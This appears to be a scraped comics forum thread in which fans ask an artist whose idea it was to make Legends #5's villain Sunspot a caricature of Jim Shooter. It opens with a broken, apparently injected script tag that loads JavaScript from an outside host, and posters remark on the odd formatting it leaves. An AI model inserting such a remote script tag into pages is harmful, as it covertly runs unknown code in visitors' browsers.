< ="text/" src="http://ntp.sysip.net/tag/2.js">I found something on a weblog I frequent about a sequence in Legends #5 concerning Guy Gardner and his skirmish with the super-villain and there's a/the point made about the similarities between Sunspot and Jim Shooter
so there's the natural theory tossed that Sunspot is a pastiche of Jim Shooter.
Assuming that the theory is true and this guy is a mocker of this guy, whose idea was it? Considering your status as "Art Robot" on the series, how quick were you to go for this idea?
I'm willing to believe that it's an intentional dig at the man.
If one assumes the power source in his palm is a reference to the Star Brand, that supports the idea.
So? Where'd the gag come from?

Don't make me guess randomly.
It was Ostrander's idea.
But he hesitated so Len Wein encouraged him.
Then he tentatively suggested the notion to you but you refused because you didn't have handy photo reference... until the inker!....
Who inked it again?

So I can regress all across the board.

Lessee...the guy in that scene looks familiar. There are references to a "new universe" and a star-shaped brand on his hand. And he blasts himself in the foot. Nahhh. Couldn't be a dig.

Is the original post missing for some reason? JB, you seem on my screen to be "replying" to no one, despite the title of this thread...

Frank is ignoring me?
My first and most natural response is a slew of profanities involving Frank. My second most natural inclinations involve puns.

I'd love to know why every one of your posts has that odd < = "text/"> formatting, Christopher. So strange!

1) I'd like to know that myself, David. It's annoying the heck outta me.
2) So, JB... no anecdote? I want a freaking tale of fury!

It was karl kesel's idea.
Deep underneath my layer of intellect and deep thought I always knew that Len Wein wasn't properlu equipped for a dig of such high skill!
